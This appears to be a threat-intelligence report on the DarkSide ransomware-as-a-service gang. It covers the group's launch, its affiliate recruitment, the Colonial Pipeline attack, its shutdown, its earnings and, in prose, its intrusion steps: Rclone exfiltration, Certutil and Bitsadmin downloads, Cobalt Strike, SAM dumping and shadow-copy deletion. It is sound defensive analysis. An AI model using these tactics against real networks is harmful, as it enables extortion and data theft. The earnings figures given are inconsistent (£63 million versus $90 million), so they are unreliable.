DarkSide: The Rise and The Fall

Cybercriminal activity of DarkSide gang was first spotted on August 10th, 2020, when the group made an initial announcement on its blog hosted on the Tor network and immediately caught some attention of the information security industry not only because of the sound of confidence of the message by stating that they already had previous experience in this kind of operation and have earned millions partnering with other cryptolockers and they were not coming from nowhere.

The post also made sure that they had a clear ‘code of conduct’ as per the types of industries they would allow the affiliates to target with their malware by limiting the attacks only to companies that could pay for the requested amount after business analysis of their net incomes and not targeting the ones from medical and education sectors, not-for-profit organizations, and government companies.

Finally, after a series of successful attacks with several companies having their data encrypted and others being double-extorted by additionally becoming victim of sensitive data exposure, the operators did not manage to maintain a low-profile on the media and not get major attention of law enforcement. On the beginning of May 2021, one of its affiliates inadvertently hit the largest pipeline system for refined oil products in the United States Colonial Pipeline. The event triggered a lot of attention to the operation and after unsuccessful attempt of the group to reduce tension, the servers were allegedly seized on May 13th and in the next day threat actors claimed to have lost access to their payment and servers accounts. Over £63 million in Bitcoin ransom payments were made to DarkSide extorted from 47 victims in 9 months of operation.

Key Takeaways

• The group is very noted for its use of different marketing techniques on the attempt of gaining some sort of legitimacy or reliability from victims and the public such as the contact with the media, use of decryption company partnerships, pretending to do charitable donations, performing a business analysis before engaging in any attack and finally by making a declaration of moral principles at the start of the operation
• DarkSide ransomware operation managed to recruit multiple operators, therefore the initial foothold tactics, techniques and procedures used by attackers may differ depending on the victim and the affiliate
• CIS (Commonwealth of Independent States) countries are not targeted by the malware and it has similarities in design and relationships the other Russian-speaking ransomware group REvil which is an evidence that says a lot about the operators’ location
• The estimated earnings of the gang were over $90 million in Bitcoin that came from 47 different victims in just 9 months, which proves how effective the operation was for the operators and its affiliates
• Despite of the fact that number of DarkSide’s victims is less than other well-known ransomware groups’ victims, the approach of using marketing techniques and only targeting companies that can pay proved to be a profitable plan for the group

Ransomware Operation: Threat Profile

Hacking Russian-speaking Darknet forums such as XSS and Exploit were the main communication channels used by the operators to advertise their product and recruit their multiple affiliates during the time of the operation. The user ‘darksupp’ was a central character in the advertisement of the Ransomware-as-a-Service product through these Darknet channels.

Short after the operation became known and malware samples were available to analysis it was confirmed that the malicious software implemented techniques to not target CIS (Commonwealth of Independent States) countries. Also, it was noticed that the ransom note has a lot of similarities with REvil ransomware in its structure. These characteristics are seen as evidence by researchers about the operators’ real location.

Victim’s exfiltrated data was stored on multiple distributed storages allegedly in Iran and according to the ransom, the data was available for at least 6 months after the upload. Even after the operation’s shutdown, one of the CDNs used for storing victim’s data which is highlighted in Figure 1 is still live at the time of this writing.

Removing from the equation countries naturally not targeted by the ransomware and companies that decided to pay for the ransom before the data was exposed, DarkSide group managed to victimize and expose 99 companies from different locations of the world that didn’t pay for the ransom throughout its around 9-10 months of operation at the time of this writing, according to DarkTracer. Figure 2 shows a mind map of victims by month.

On May 14th a post was made on XSS forum on behalf of the DarkSide group by the user ‘UNKN’ about the operation seizure as seen in Figure 3. This user is known to be the main character behind REvil ransomware.

Attack and Behaviors Overview

DarkSide ransomware operation managed to recruit multiple operators, therefore the initial foothold techniques used by attackers may differ depending on the victim and the affiliate. FireEye has identified at least 5 different threat clusters distributing the malware.

After gaining access to the affected system, the intruders work on collecting and exfiltrating as much data as possible from the victim and uploading the data to cloud-based hosting providers and storage services such as pCloud using Rclone to transfer data over SFTP and SMB.

PowerShell is then used to download the malicious binary abusing utilities such as Certutil.exe and Bitsadmin.exe. After that, on the infected machine, a shared folder is created to store a copy of the malware using PowerShell too.

Threat clusters identified by FireEye can make use of tools such as Advanced IP Scanner, Bloodhound, and Cobalt Strike and RDP protocol for internal reconnaissance and lateral movement within the victim’s environments.

The attackers aim for the Domain Controller to dump SAM hive and download the malicious binary from the shared folder that was created previously. The binary is stored on folder created in the DC itself that is named after the company’s name. Later, the damage is maximized by distributing the binary from the shared folder to other reachable hosts in the network leveraging Bitsadmin.exe.

Finally, after exfiltrating data from the environment, the ransomware file is executed on the DC through a scheduled task. The malware uses the language packages installed on the infected system as a condition to determine whether the encryption process is going to proceed or not. It uninstalls Volume Shadow Copy Service (VSS) and deletes shadows copies using PowerShell.

Reference Links

1. https://www.digitalshadows.com/blog-and-research/not-another-ransomware-blog-initial-access-brokers-and-their-role/
2. https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
3. https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short
4. https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime
5. https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin
6. https://attack.mitre.org/versions/v9/